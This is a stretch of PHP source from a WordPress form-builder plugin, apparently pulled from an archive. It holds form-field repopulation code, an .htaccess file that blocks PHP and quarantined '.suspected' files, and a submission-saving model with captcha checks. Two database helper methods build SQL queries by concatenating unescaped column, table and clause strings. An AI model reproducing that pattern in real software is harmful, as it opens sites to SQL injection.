                      $element = isset($_POST[$label_id[$key]."_element".$id.$j]) ? esc_html(stripslashes($_POST[$label_id[$key]."_element".$id.$j])) : NULL;
                      if(isset($element))
                          {
                          $form_maker_front_end .= 
    "document.getElementById('".$label_id[$key]."_element".$id.$j."').setAttribute('checked', 'checked');
    ";
                          }
                  }
      
                  $form_maker_front_end .= 
    "
    if(document.getElementById('".$label_id[$key]."_element_quantity".$id."'))
      document.getElementById('".$label_id[$key]."_element_quantity".$id."').value='".((isset($_POST[$label_id[$key]."_element_quantity".$id])) ? addslashes($_POST[$label_id[$key]."_element_quantity".$id]) : 1)."';
      ";
      for($j=0; $j<100; $j++)
                  {
                      $element = isset($_POST[$label_id[$key]."_property".$id.$j]) ? esc_html(stripslashes($_POST[$label_id[$key]."_property".$id.$j])) : NULL;
                      if(isset($element))
                          {
                          $form_maker_front_end .= 
    "document.getElementById('".$label_id[$key]."_property".$id.$j."').value='".addslashes($element)."';
    ";
                          }
                  };	
                  break;
                  }		
    case "type_paypal_radio":{
                
                $form_maker_front_end .= 
    "
    for(k=0; k<50; k++)
      if(document.getElementById('".$label_id[$key]."_element".$id."'+k))
      {
        document.getElementById('".$label_id[$key]."_element".$id."'+k).removeAttribute('checked');
        if(document.getElementById('".$label_id[$key]."_element".$id."'+k).value=='".addslashes(isset($_POST[$label_id[$key]."_element".$id]) ? esc_html(stripslashes($_POST[$label_id[$key]."_element".$id])) : "")."')
        {
          document.getElementById('".$label_id[$key]."_element".$id."'+k).setAttribute('checked', 'checked');
                  
        }
      }
      

    if(document.getElementById('".$label_id[$key]."_element_quantity".$id."'))
      document.getElementById('".$label_id[$key]."_element_quantity".$id."').value='".((isset($_POST[$label_id[$key]."_element_quantity".$id])) ? esc_html(stripslashes($_POST[$label_id[$key]."_element_quantity".$id])) : 1)."';
      ";
      for($j=0; $j<100; $j++)
                  {
                      $element = isset($_POST[$label_id[$key]."_property".$id.$j]) ? esc_html(stripslashes($_POST[$label_id[$key]."_property".$id.$j])) : NULL;
                      if(isset($element))
                          {
                          $form_maker_front_end .= 
    "document.getElementById('".$label_id[$key]."_property".$id.$j."').value='".addslashes($element)."';
    ";
                          }
                  };
      
    
                  
                  break;
                  }
                  
          case "type_paypal_shipping":{
        
                  $form_maker_front_end .= 
    "
    for(k=0; k<50; k++)
      if(document.getElementById('".$label_id[$key]."_element".$id."'+k))
      {
        document.getElementById('".$label_id[$key]."_element".$id."'+k).removeAttribute('checked');
        if(document.getElementById('".$label_id[$key]."_element".$id."'+k).value=='".addslashes(isset($_POST[$label_id[$key]."_element".$id]) ? esc_html(stripslashes($_POST[$label_id[$key]."_element".$id])) : "")."')
        {
          document.getElementById('".$label_id[$key]."_element".$id."'+k).setAttribute('checked', 'checked');
                  
        }
      }
    
    ";
    
              break;
                }
            case "type_star_rating": {
              $form_maker_front_end .=
            "if(document.getElementById('".$label_id[$key]."_element".$id."')) {
              document.getElementById('".$label_id[$key]."_selected_star_amount".$id."').value='".addslashes(isset($_POST[$label_id[$key]."_selected_star_amount".$id]) ? esc_html(stripslashes($_POST[$label_id[$key]."_selected_star_amount".$id])) : "")."';	
              if (document.getElementById('".$label_id[$key]."_selected_star_amount".$id."').value)	
                select_star_rating((document.getElementById('".$label_id[$key]."_selected_star_amount".$id."').value-1),".$label_id[$key].",".$id.");	
            }";
              break;
            
            }

          case "type_scale_rating": {
            $form_maker_front_end .=
            "for (k=0; k<100; k++) {
              if (document.getElementById('".$label_id[$key]."_scale_radio".$id."_'+k)) {
                document.getElementById('".$label_id[$key]."_scale_radio".$id."_'+k).removeAttribute('checked');
                if (document.getElementById('".$label_id[$key]."_scale_radio".$id."_'+k).value=='".(isset($_POST[$label_id[$key]."_scale_radio".$id]) ? esc_html(stripslashes($_POST[$label_id[$key]."_scale_radio".$id])) : "")."')
                  document.getElementById('".$label_id[$key]."_scale_radio".$id."_'+k).setAttribute('checked', 'checked');
              }
            }";
            break;

          }
          case "type_spinner": {
            $form_maker_front_end .=
            "if (document.getElementById('".$label_id[$key]."_element".$id."')) {
              document.getElementById('".$label_id[$key]."_element".$id."').setAttribute('aria-valuenow','".(isset($_POST[$label_id[$key]."_element".$id]) ? esc_html(stripslashes($_POST[$label_id[$key]."_element".$id])) : "")."');
            }";
            break;

          }
          case "type_slider": {
            $form_maker_front_end .=
            "if (document.getElementById('".$label_id[$key]."_element".$id."'))
              document.getElementById('".$label_id[$key]."_element".$id."').setAttribute('aria-valuenow','".(isset($_POST[$label_id[$key]."_slider_value".$id]) ? esc_html(stripslashes($_POST[$label_id[$key]."_slider_value".$id])) : "")."');
            if (document.getElementById('".$label_id[$key]."_slider_value".$id."'))
              document.getElementById('".$label_id[$key]."_slider_value".$id."').value='".(isset($_POST[$label_id[$key]."_slider_value".$id]) ? esc_html(stripslashes($_POST[$label_id[$key]."_slider_value".$id])) : "")."';
            if (document.getElementById('".$label_id[$key]."_element_value".$id."'))
              document.getElementById('".$label_id[$key]."_element_value".$id."').innerHTML='".(isset($_POST[$label_id[$key]."_slider_value".$id]) ? esc_html(stripslashes($_POST[$label_id[$key]."_slider_value".$id])) : "")."';";
            break;

          }
          case "type_range": {
            $form_maker_front_end .=
              "if (document.getElementById('".$label_id[$key]."_element".$id."0'))
                document.getElementById('".$label_id[$key]."_element".$id."0').setAttribute('aria-valuenow','".(isset($_POST[$label_id[$key]."_element".$id."0"]) ? esc_html(stripslashes($_POST[$label_id[$key]."_element".$id."0"])) : "")."');
              if (document.getElementById('".$label_id[$key]."_element".$id."1'))
                document.getElementById('".$label_id[$key]."_element".$id."1').setAttribute('aria-valuenow','".(isset($_POST[$label_id[$key]."_element".$id."1"]) ? esc_html(stripslashes($_POST[$label_id[$key]."_element".$id."1"])) : "")."');";
            break;

          }
          case "type_grading": {
            for ($k = 0; $k < 100; $k++) {
              $form_maker_front_end .= "if (document.getElementById('".$label_id[$key]."_element".$id.$k."')) {		
                document.getElementById('".$label_id[$key]."_element".$id.$k."').value='".(isset($_POST[$label_id[$key]."_element".$id.$k]) ? esc_html(stripslashes($_POST[$label_id[$key]."_element".$id.$k])) : "")."';}";
            }
            $form_maker_front_end .= "sum_grading_values(".$label_id[$key].",".$id.");";
            break;

          }
          case "type_matrix": {
            $form_maker_front_end .= 
            "if (document.getElementById('".$label_id[$key]."_input_type".$id."').value == 'radio') {";	
              for ($k = 1; $k < 40; $k++) {
                for ($l = 1; $l < 40; $l++) {
                  $form_maker_front_end .= 
                    "if (document.getElementById('".$label_id[$key]."_input_element".$id.$k."_".$l."')) {
                      document.getElementById('".$label_id[$key]."_input_element".$id.$k."_".$l."').removeAttribute('checked');
                      if (document.getElementById('".$label_id[$key]."_input_element".$id.$k."_".$l."').value=='".(isset($_POST[$label_id[$key]."_input_element".$id.$k]) ? esc_html(stripslashes($_POST[$label_id[$key]."_input_element".$id.$k])) : "")."')
                        document.getElementById('".$label_id[$key]."_input_element".$id.$k."_".$l."').setAttribute('checked', 'checked');
                    }";
                }
              }
              $form_maker_front_end .= 
            "}	
            else	
              if (document.getElementById('".$label_id[$key]."_input_type".$id."').value == 'checkbox') {";
              for ($k = 1; $k < 40; $k++) {
                for ($l = 1; $l < 40; $l++) {
                  $form_maker_front_end .= 
                  "if (document.getElementById('".$label_id[$key]."_input_element".$id.$k."_".$l."')) {
                    document.getElementById('".$label_id[$key]."_input_element".$id.$k."_".$l."').removeAttribute('checked');
                    if (document.getElementById('".$label_id[$key]."_input_element".$id.$k."_".$l."').value=='".(isset($_POST[$label_id[$key]."_input_element".$id.$k."_".$l]) ? esc_html(stripslashes($_POST[$label_id[$key]."_input_element".$id.$k."_".$l])) : "")."')		
                      document.getElementById('".$label_id[$key]."_input_element".$id.$k."_".$l."').setAttribute('checked', 'checked');
                  }";	
                }
              }
              $form_maker_front_end .= 
            "}	
            else	
              if (document.getElementById('".$label_id[$key]."_input_type".$id."').value == 'text') {";
              for ($k = 1; $k < 40; $k++) {
                for ($l = 1; $l < 40; $l++) {
                  $form_maker_front_end .= 
                  "if (document.getElementById('".$label_id[$key]."_input_element".$id.$k."_".$l."'))
                    document.getElementById('".$label_id[$key]."_input_element".$id.$k."_".$l."').value='".(isset($_POST[$label_id[$key]."_input_element".$id.$k."_".$l]) ? esc_html(stripslashes($_POST[$label_id[$key]."_input_element".$id.$k."_".$l])) : "")."';";
                }
              }
              $form_maker_front_end .= "
            }
            else
              if (document.getElementById('".$label_id[$key]."_input_type".$id."').value == 'select') {";
                for ($k = 1; $k < 40; $k++) {
                  for ($l = 1; $l < 40; $l++) {
                    $form_maker_front_end .= 
                    "if (document.getElementById('".$label_id[$key]."_select_yes_no".$id.$k."_".$l."'))
                      document.getElementById('".$label_id[$key]."_select_yes_no".$id.$k."_".$l."').value='".(isset($_POST[$label_id[$key]."_select_yes_no".$id.$k."_".$l]) ? esc_html(stripslashes($_POST[$label_id[$key]."_select_yes_no".$id.$k."_".$l])) : "")."';";
                  }
                }
              $form_maker_front_end .= 
              "}";	
              break;

            }
            case "type_address":
              {
              if ($key > $old_key) {
                $form_maker_front_end .= "if(document.getElementById('" . $label_id[$key] . "_street1" . $id . "'))
    {
        document.getElementById('" . $label_id[$key] . "_street1" . $id . "').value='" . addslashes(isset($_POST[$label_id[$key] . "_street1" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_street1" . $id])) : "") . "';
        document.getElementById('" . $label_id[$key] . "_street2" . $id . "').value='" . addslashes(isset($_POST[$label_id[$key + 1] . "_street2" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key + 1] . "_street2" . $id])) : "") . "';
        document.getElementById('" . $label_id[$key] . "_city" . $id . "').value='" . addslashes(isset($_POST[$label_id[$key + 2] . "_city" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key + 2] . "_city" . $id])) : "") . "';
        document.getElementById('" . $label_id[$key] . "_state" . $id . "').value='" . addslashes(isset($_POST[$label_id[$key + 3] . "_state" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key + 3] . "_state" . $id])) : "") . "';
        document.getElementById('" . $label_id[$key] . "_postal" . $id . "').value='" . addslashes(isset($_POST[$label_id[$key + 4] . "_postal" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key + 4] . "_postal" . $id])) : "") . "';
        document.getElementById('" . $label_id[$key] . "_country" . $id . "').value='" . addslashes(isset($_POST[$label_id[$key + 5] . "_country" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key + 5] . "_country" . $id])) : "") . "';
      
    }";
                $old_key = $key + 5;
              }
              break;
              }
            case "type_checkbox":
              {
              $is_other = FALSE;
              if (isset($_POST[$label_id[$key] . "_allow_other" . $id]) && esc_html(stripslashes($_POST[$label_id[$key] . "_allow_other" . $id])) == "yes") {
                $other_element = isset($_POST[$label_id[$key] . "_other_input" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_other_input" . $id])) : "";
                $other_element_id = isset($_POST[$label_id[$key] . "_allow_other_num" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_allow_other_num" . $id])) : NULL;
                if (isset($_POST[$label_id[$key] . "_allow_other_num" . $id]))
                  $is_other = TRUE;
              }
              $form_maker_front_end .= "
    if(document.getElementById('" . $label_id[$key] . "_other_input" . $id . "'))
    {
    document.getElementById('" . $label_id[$key] . "_other_input" . $id . "').parentNode.removeChild(document.getElementById('" . $label_id[$key] . "_other_br" . $id . "'));
    document.getElementById('" . $label_id[$key] . "_other_input" . $id . "').parentNode.removeChild(document.getElementById('" . $label_id[$key] . "_other_input" . $id . "'));
    }
    for(k=0; k<30; k++)
      if(document.getElementById('" . $label_id[$key] . "_element" . $id . "'+k))
        document.getElementById('" . $label_id[$key] . "_element" . $id . "'+k).removeAttribute('checked');
      else break;
    ";
              for ($j = 0; $j < 100; $j++) {
                $element = isset($_POST[$label_id[$key] . "_element" . $id . $j]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_element" . $id . $j])) : NULL;
                if (isset($_POST[$label_id[$key] . "_element" . $id . $j])) {
                  $form_maker_front_end .= "document.getElementById('" . $label_id[$key] . "_element" . $id . $j . "').setAttribute('checked', 'checked');
    ";
                }
              }
              if ($is_other)
                $form_maker_front_end .= "
      show_other_input('" . $label_id[$key] . "','" . $id . "');
      document.getElementById('" . $label_id[$key] . "_other_input" . $id . "').value='" . (isset($_POST[$label_id[$key] . "_other_input" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_other_input" . $id])) : "") . "';
    ";
              break;
              }
            case "type_radio":
              {
              $is_other = FALSE;
              if (isset($_POST[$label_id[$key] . "_allow_other" . $id]) && esc_html(stripslashes($_POST[$label_id[$key] . "_allow_other" . $id])) == "yes") {
                $other_element = isset($_POST[$label_id[$key] . "_other_input" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_other_input" . $id])) : "";
                if (isset($_POST[$label_id[$key] . "_other_input" . $id]))
                  $is_other = TRUE;
              }
              $form_maker_front_end .= "
    if(document.getElementById('" . $label_id[$key] . "_other_input" . $id . "'))
    {
    document.getElementById('" . $label_id[$key] . "_other_input" . $id . "').parentNode.removeChild(document.getElementById('" . $label_id[$key] . "_other_br" . $id . "'));
    document.getElementById('" . $label_id[$key] . "_other_input" . $id . "').parentNode.removeChild(document.getElementById('" . $label_id[$key] . "_other_input" . $id . "'));
    }
    
    for(k=0; k<50; k++)
      if(document.getElementById('" . $label_id[$key] . "_element" . $id . "'+k))
      {
        document.getElementById('" . $label_id[$key] . "_element" . $id . "'+k).removeAttribute('checked');
        if(document.getElementById('" . $label_id[$key] . "_element" . $id . "'+k).value=='" . addslashes(isset($_POST[$label_id[$key] . "_element" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_element" . $id])) : "") . "')
        {
          document.getElementById('" . $label_id[$key] . "_element" . $id . "'+k).setAttribute('checked', 'checked');
                  
        }
      }
      else break;
    ";
              if ($is_other)
                $form_maker_front_end .= "
      show_other_input('" . $label_id[$key] . "','" . $id . "');
      document.getElementById('" . $label_id[$key] . "_other_input" . $id . "').value='" . (isset($_POST[$label_id[$key] . "_other_input" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_other_input" . $id])) : "") . "';
    ";
              break;
              }
            case "type_time":
              {
              $ss = isset($_POST[$label_id[$key] . "_ss" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_ss" . $id])) : "";
              if (isset($_POST[$label_id[$key] . "_ss" . $id])) {
                $form_maker_front_end .= "if(document.getElementById('" . $label_id[$key] . "_hh" . $id . "'))
    {
      document.getElementById('" . $label_id[$key] . "_hh" . $id . "').value='" . (isset($_POST[$label_id[$key] . "_hh" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_hh" . $id])) : "") . "';
      document.getElementById('" . $label_id[$key] . "_mm" . $id . "').value='" . (isset($_POST[$label_id[$key] . "_mm" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_mm" . $id])) : "") . "';
      document.getElementById('" . $label_id[$key] . "_ss" . $id . "').value='" . (isset($_POST[$label_id[$key] . "_ss" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_ss" . $id])) : "") . "';
    }";
              }
              else {
                $form_maker_front_end .= "if(document.getElementById('" . $label_id[$key] . "_hh" . $id . "'))
    {
      document.getElementById('" . $label_id[$key] . "_hh" . $id . "').value='" . (isset($_POST[$label_id[$key] . "_hh" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_hh" . $id])) : "") . "';
      document.getElementById('" . $label_id[$key] . "_mm" . $id . "').value='" . (isset($_POST[$label_id[$key] . "_mm" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_mm" . $id])) : "") . "';
    }";
              }
              $am_pm = isset($_POST[$label_id[$key] . "_am_pm" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_am_pm" . $id])) : NULL;
              if (isset($am_pm))
                $form_maker_front_end .= "if(document.getElementById('" . $label_id[$key] . "_am_pm" . $id . "'))
      document.getElementById('" . $label_id[$key] . "_am_pm" . $id . "').value='" . $am_pm . "';
    ";
              break;
              }
            case "type_date_fields":
              {
              $form_maker_front_end .= "if(document.getElementById('" . $label_id[$key] . "_day" . $id . "'))
    {
      document.getElementById('" . $label_id[$key] . "_day" . $id . "').value='" . (isset($_POST[$label_id[$key] . "_day" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_day" . $id])) : "") . "';
      document.getElementById('" . $label_id[$key] . "_month" . $id . "').value='" . (isset($_POST[$label_id[$key] . "_month" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_month" . $id])) : "") . "';
      document.getElementById('" . $label_id[$key] . "_year" . $id . "').value='" . (isset($_POST[$label_id[$key] . "_year" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_year" . $id])) : "") . "';
    }";
              break;
              }
            case "type_date":
            case "type_own_select":
            case "type_country":
              {
              $form_maker_front_end .= "if(document.getElementById('" . $label_id[$key] . "_element" . $id . "'))
      document.getElementById('" . $label_id[$key] . "_element" . $id . "').value='" . addslashes(isset($_POST[$label_id[$key] . "_element" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_element" . $id])) : "") . "';
    ";
              break;
              }
            default:
              {
              break;
              }
          }
        }
      }
      $form_maker_front_end .= '	form_view_count' . $id . '=0;
    for(i=1; i<=30; i++)
    {
      if(document.getElementById(\'' . $id . 'form_view\'+i))
      {
        form_view_count' . $id . '++;
        form_view_max' . $id . '=i;
        document.getElementById(\'' . $id . 'form_view\'+i).parentNode.removeAttribute(\'style\');
      }
    }	
    if(form_view_count' . $id . '>1)
    {
      for(i=1; i<=form_view_max' . $id . '; i++)
      {
        if(document.getElementById(\'' . $id . 'form_view\'+i))
        {
          first_form_view' . $id . '=i;
          break;
        }
      }		
      generate_page_nav(first_form_view' . $id . ', \'' . $id . '\', form_view_count' . $id . ', form_view_max' . $id . ');
    }
    var RecaptchaOptions = {
  theme: "' . $row->recaptcha_theme . '"
  };
  </script>
  </form>';
      if ($is_recaptcha) {
        $form_maker_front_end .= '<div id="main_recaptcha" style="display:none;">';
        if ($row->public_key)
          $publickey = $row->public_key;
        else
          $publickey = '0';
        $error = NULL;
        require_once(WD_FMC_DIR . '/recaptchalib.php');
        $form_maker_front_end .= recaptcha_get_html($publickey, $error);
        $form_maker_front_end .= '</div>
      <script>
    recaptcha_html = document.getElementById(\'main_recaptcha\').innerHTML.replace(\'Recaptcha.widget = Recaptcha.$("recaptcha_widget_div"); Recaptcha.challenge_callback();\',"");
    document.getElementById(\'main_recaptcha\').innerHTML="";
    if (document.getElementById(\'wd_recaptcha' . $id . '\')) {
      document.getElementById(\'wd_recaptcha' . $id . '\').innerHTML=recaptcha_html;
      Recaptcha.widget = Recaptcha.$("recaptcha_widget_div");
      Recaptcha.challenge_callback();
    }
      </script>';
      }
    }
    return $form_maker_front_end;
  }
  
  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}frontend/models/.htaccess000044400000000424152434416630011452 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>frontend/models/FMModelForm_maker_fmc.php000060400000623753152434416630014516 0ustar00<?php

class FMModelForm_maker_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function showform($id) {
    global $wpdb;
    $row = $wpdb->get_row($wpdb->prepare('SELECT * FROM ' . $wpdb->prefix . 'formmaker WHERE id="%d"', $id));
    if (!$row || !$row->published) {
      return FALSE;
    }
    if (isset($_GET['test_theme']) && (esc_html(stripslashes($_GET['test_theme'])) != '')) {
      /* From preview.*/
      $theme_id = esc_html(stripslashes($_GET['test_theme']));
    }
    else {
      $theme_id = $row->theme;
    }
    $form_theme = $wpdb->get_var($wpdb->prepare('SELECT css FROM ' . $wpdb->prefix . 'formmaker_themes WHERE id="%d"', $theme_id));
    if (!$form_theme) {
      $form_theme = $wpdb->get_var('SELECT css FROM ' . $wpdb->prefix . 'formmaker_themes');
      if (!$form_theme) {
        return FALSE;
      }
    }
    $label_id = array();
    $label_type = array();
    $label_all = explode('#****#', $row->label_order);
    $label_all = array_slice($label_all, 0, count($label_all) - 1);
    foreach ($label_all as $key => $label_each) {
      $label_id_each = explode('#**id**#', $label_each);
      array_push($label_id, $label_id_each[0]);
      $label_order_each = explode('#**label**#', $label_id_each[1]);
      array_push($label_type, $label_order_each[1]);
    }
    return array(
      $row,
      1,
      $label_id,
      $label_type,
      $form_theme
    );
  }

  public function savedata($form, $id) {
	$fmc_settings = get_option('fmc_settings');
    $all_files = array();
    $correct = FALSE;
    $id_for_old = $id;
    if (!$form->form_front) {
      $id = '';
    }
    if (isset($_POST["counter" . $id])) {
      $counter = esc_html($_POST["counter" . $id]);
      if (isset($_POST["captcha_input"])) {
        $captcha_input = esc_html($_POST["captcha_input"]);
        $session_wd_captcha_code = isset($_SESSION[$id . '_wd_captcha_code']) ? $_SESSION[$id . '_wd_captcha_code'] : '-';
        if (md5($captcha_input) == $session_wd_captcha_code) {
          $correct = TRUE;
        }
        else {
          ?>
          <script>alert("<?php echo addslashes(__('Error, incorrect Security code.', 'form_maker')); ?>");</script>
          <?php
        }
      }
	   elseif (isset($_POST["arithmetic_captcha_input"])) {
        $arithmetic_captcha_input = esc_html($_POST["arithmetic_captcha_input"]);
        $session_wd_arithmetic_captcha_code = isset($_SESSION[$id . '_wd_arithmetic_captcha_code']) ? $_SESSION[$id . '_wd_arithmetic_captcha_code'] : '-';
        if (md5($arithmetic_captcha_input) == $session_wd_arithmetic_captcha_code) {
          $correct = TRUE;
        }
        else {
          ?>
          <script>alert("<?php echo addslashes(__('Error, incorrect Security code.', 'form_maker')); ?>");</script>
          <?php
        }
      }
	  elseif (isset($_POST["g-recaptcha-response"])){
		$privatekey= isset($fmc_settings['private_key']) ? $fmc_settings['private_key'] : '';	
		$captcha = $_POST['g-recaptcha-response'];
		$url = 'https://www.google.com/recaptcha/api/siteverify';
		$data = array(
			'secret' => $privatekey,
			'response' => $captcha,
			'remoteip' => $_SERVER['REMOTE_ADDR']
		);
    
		$curlConfig = array(
			CURLOPT_URL => $url,
			CURLOPT_POST => true,
			CURLOPT_RETURNTRANSFER => true,
			CURLOPT_POSTFIELDS => $data
		);

		$ch = curl_init();
		curl_setopt_array($ch, $curlConfig);
		$response = curl_exec($ch);
		curl_close($ch);
    
		$jsonResponse = json_decode($response);

		if ($jsonResponse->success == "true")
			$correct = TRUE;
		else {
			?>
			<script>alert("<?php echo addslashes(__('Error, incorrect Security code.', 'form_maker')); ?>");</script>
			<?php
		}
	  }
      else {
        $correct = TRUE;
      }
      if ($correct) {
        
        $ip=$_SERVER['REMOTE_ADDR'];
        
        global $wpdb;
        $blocked_ip = $wpdb->get_var($wpdb->prepare('SELECT * FROM ' . $wpdb->prefix . 'formmaker_blocked WHERE ip="%s"', $ip));
        if ($blocked_ip) {
          $_SESSION['massage_after_submit' . $id] = addslashes(__('Your ip is blacklisted. Please contact the website administrator.', 'form_maker'));
          wp_redirect($_SERVER["REQUEST_URI"]);//to be checked
          exit;
        }
        
        $result_temp = $this->save_db($counter, $id_for_old);
        $all_files = $result_temp[0];
        if (is_numeric($all_files)) {
          $this->remove($all_files, $id_for_old);
        }
        elseif (isset($counter)) {
          $this->gen_mail($counter, $all_files, $id_for_old, $result_temp[1]);
        }
         
      }    
      return $all_files;
    }
 
    return $all_files;
  }
  
   public function select_data_from_db_for_labels($db_info,$label_column, $table, $where, $order_by) {
        global $wpdb;
        
		$query = "SELECT `".$label_column."` FROM ".$table.$where." ORDER BY ".$order_by;
		if($db_info)
			{ 
			
			    $temp		= explode('@@@wdfhostwdf@@@',$db_info);
				$host		= $temp[0];
				$temp		= explode('@@@wdfportwdf@@@',$temp[1]);
				$port		= $temp[0];
				$temp		= explode('@@@wdfusernamewdf@@@',$temp[1]);
				$username	= $temp[0];
				$temp		= explode('@@@wdfpasswordwdf@@@',$temp[1]);
				$password	= $temp[0];
				$temp		= explode('@@@wdfdatabasewdf@@@',$temp[1]);
				$database	= $temp[0];
				 
				$wpdb_temp = new wpdb($username, $password, $database, $host);
				$choices_labels = $wpdb_temp->get_results($query,ARRAY_N);				
			}
		else{
            $choices_labels = $wpdb->get_results($query,ARRAY_N);
        }
        return $choices_labels;
  } 
  
  public function select_data_from_db_for_values($db_info,$value_column, $table, $where, $order_by) {
        global $wpdb;
		  
		$query = "SELECT `".$value_column."` FROM ".$table.$where." ORDER BY ".$order_by;
		if($db_info)
			{ 
			    $temp		= explode('@@@wdfhostwdf@@@',$db_info);
				$host		= $temp[0];
				$temp		= explode('@@@wdfportwdf@@@',$temp[1]);
				$port		= $temp[0];
				$temp		= explode('@@@wdfusernamewdf@@@',$temp[1]);
				$username	= $temp[0];
				$temp		= explode('@@@wdfpasswordwdf@@@',$temp[1]);
				$password	= $temp[0];
				$temp		= explode('@@@wdfdatabasewdf@@@',$temp[1]);
				$database	= $temp[0];
				 
				$wpdb_temp = new wpdb($username, $password, $database, $host);
				$choices_values = $wpdb_temp->get_results($query,ARRAY_N);				
			}
		else{
            $choices_values = $wpdb->get_results($query,ARRAY_N);
        }
        return $choices_values; 
  }
  
  public function save_db($counter, $id) {
    global $wpdb;
	$current_user =  wp_get_current_user();
	if ($current_user->ID != 0)
	{
		$wp_userid =  $current_user->ID;
		$wp_username =  $current_user->display_name;
		$wp_useremail =  $current_user->user_email;
	}
	else
	{
		$wp_userid = '';
		$wp_username = '';
		$wp_useremail = '';
	}
	$ip = $_SERVER['REMOTE_ADDR']; 
	 
    $chgnac = TRUE;
    $all_files = array();
    $paypal = array();
    $paypal['item_name'] = array();
    $paypal['quantity'] = array();
    $paypal['amount'] = array();
    $is_amount=false;
    $paypal['on_os'] = array();
    $total = 0;
    $form_currency = '$';
    $currency_code = array('USD', 'EUR', 'GBP', 'JPY', 'CAD', 'MXN', 'HKD', 'HUF', 'NOK', 'NZD', 'SGD', 'SEK', 'PLN', 'AUD', 'DKK', 'CHF', 'CZK', 'ILS', 'BRL', 'TWD', 'MYR', 'PHP', 'THB');
    $currency_sign = array('$', '&#8364;', '&#163;', '&#165;', 'C$', 'Mex$', 'HK$', 'Ft', 'kr', 'NZ$', 'S$', 'kr', 'zl', 'A$', 'kr', 'CHF', 'Kc', '&#8362;', 'R$', 'NT$', 'RM', '&#8369;', '&#xe3f;');
    $form = $wpdb->get_row($wpdb->prepare("SELECT * FROM " . $wpdb->prefix . "formmaker WHERE id= %d", $id));
    $id_old = $id;
    if (!$form->form_front) {
      $id = '';
    }
    if ($form->payment_currency) {
      $form_currency = $currency_sign[array_search($form->payment_currency, $currency_code)];
    }
    $old = false;		
		if(isset($form->form)) {
			$old = true;
    }
    $label_id = array();
    $label_label = array();
    $label_type = array();
    
    $disabled_fields = explode(',', (isset($_REQUEST["disabled_fields".$id]) ? $_REQUEST["disabled_fields".$id] : ""));
    $disabled_fields = array_slice($disabled_fields,0, count($disabled_fields)-1);
    
    if($old == false || ($old == true && $form->form=='')) {
      $label_all	= explode('#****#',$form->label_order_current);		
    }
    else {
      $label_all	= explode('#****#',$form->label_order);
    }
    $label_all = array_slice($label_all, 0, count($label_all) - 1);
    foreach ($label_all as $key => $label_each) {
      $label_id_each = explode('#**id**#', $label_each);
      array_push($label_id, $label_id_each[0]);
      $label_order_each = explode('#**label**#', $label_id_each[1]);
      array_push($label_label, $label_order_each[0]);
      array_push($label_type, $label_order_each[1]);
    }
    $max = $wpdb->get_var("SELECT MAX( group_id ) FROM " . $wpdb->prefix . "formmaker_submits");
    $fvals=array();
    if ($old == FALSE || ($old == TRUE && $form->form == '')) {
		foreach ($label_type as $key => $type) {
			$value = '';
			if ($type == "type_submit_reset" or $type == "type_map" or $type == "type_editor" or  $type == "type_captcha" or $type == "type_arithmetic_captcha" or  $type == "type_recaptcha" or  $type == "type_button" or $type == "type_paypal_total" or $type == "type_send_copy") 
				continue;
        
			$i = $label_id[$key];
			if(!in_array($i,$disabled_fields)) {
				switch ($type) {
				case 'type_text':
				case 'type_password':
				case 'type_textarea':
				case "type_submitter_mail":
				case "type_date":
				case "type_own_select":					
				case "type_country":				
				case "type_number": {
				  $value = isset($_POST['wdform_'.$i."_element".$id]) ? esc_html($_POST['wdform_'.$i."_element".$id]) : "";
				  break;
				}
				case "type_wdeditor": {
				  $value = isset($_POST['wdform_'.$i.'_wd_editor'.$id]) ? esc_html($_POST['wdform_'.$i.'_wd_editor'.$id]) : "";
				  break;
				}
				case "type_mark_map": {
